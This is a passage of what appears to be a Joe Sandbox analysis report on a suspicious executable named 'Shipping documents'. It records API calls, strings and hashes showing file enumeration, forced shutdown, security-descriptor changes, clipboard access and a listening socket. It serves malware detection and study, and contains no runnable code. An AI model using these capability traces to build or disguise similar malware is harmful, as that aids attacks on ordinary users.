                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 999945258-2428617273
                                                                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                                                                          • _wcscat.LIBCMT ref: 004034BC
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                                                                          • _wcslen.LIBCMT ref: 00403623
                                                                                                          • _wcslen.LIBCMT ref: 0040367D
                                                                                                          Strings
                                                                                                          • Unterminated string, xrefs: 00428348
                                                                                                          • Error opening the file, xrefs: 00428231
                                                                                                          • _, xrefs: 0040371C
                                                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                          • API String ID: 3393021363-188983378
                                                                                                          • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                          • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1409584000-438819550
                                                                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                          APIs
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 2192556992-3457252023
                                                                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                          APIs
                                                                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                          • __swprintf.LIBCMT ref: 004722B9
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: FolderPath$LocalTime__swprintf
• String ID: %.3d
• API String ID: 3337348382-986655627
• Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
• Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
• Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
• Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 1255039815-0
• Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
• Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
• Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
• Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
APIs
• __swprintf.LIBCMT ref: 00433073
• __swprintf.LIBCMT ref: 00433085
• __wcsicoll.LIBCMT ref: 00433092
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
• LoadResource.KERNEL32(?,00000000), ref: 004330BD
• LockResource.KERNEL32(00000000), ref: 004330CA
• FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
• LoadResource.KERNEL32(?,00000000), ref: 00433105
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
• String ID:
• API String ID: 1158019794-0
• Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
• Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
• Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
• Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
• Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
• Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
• Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D627
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
• GetLastError.KERNEL32 ref: 0045D6BF
• SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
• Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
• Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
• Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_strncmp
                                                                                                          • String ID: @oH$\$^$h
                                                                                                          • API String ID: 2175499884-3701065813
                                                                                                          • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                          • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                          • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                          • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 540024437-0
                                                                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
